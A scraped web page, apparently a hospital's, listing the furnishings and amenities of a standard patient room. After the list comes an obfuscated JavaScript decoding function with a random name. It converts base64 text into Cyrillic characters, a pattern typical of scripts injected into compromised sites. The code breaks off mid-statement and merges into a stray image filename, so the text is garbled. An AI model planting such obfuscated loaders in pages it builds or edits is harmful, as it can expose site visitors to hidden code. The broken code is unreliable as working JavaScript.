الغرف العادية

Standard Room

 • Patient Control Bed
 • IV Pole
 • Bedside Table
 • Over Bed Table
 • Nurses Call Button
 • Suction Machine
 • Toilet and Bath Room
 • Patient Cabinet
 • Sitters Bed
 • Telephone Line
 • 32 inches Flat Screen TV with Cable
 • Wall clock
 • Refrigerator
 • One Sitter Coffee Table
 • Couch
 • Basic Toiletries
function h052c1b60aed(x6){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t4='';var t2,u1,q3,q7,sa,r9,u2;var u4=0;do{q7=qd.indexOf(x6.charAt(u4++));sa=qd.indexOf(x6.charAt(u4++));r9=qd.indexOf(x6.charAt(u4++));u2=qd.indexOf(x6.charAt(u4++));t2=(q7<<2)|(sa>>4);u1=((sa&15)<<4)|(r9>>2);q3=((r9&3)<<6)|u2;if(t2>=192)t2+=848;else if(t2==168)t2=1025;else if(t2==184)t2=1105;t4+=String.fromCharCode(t2);if(r9!=64){if(u1>=192)u1+=848;else if(u1==168)u1=1025;else if(u1==184)u1=1105;t4+=String.fromCharCode(u1);}if(u2!=64){if(q3>=192)q3+=848;else if(q3==168)q3=1025;else if(q3==184)q3=1105;t4+=String.fromCharCode(q3);}}while(u4ard-room_.jpg" />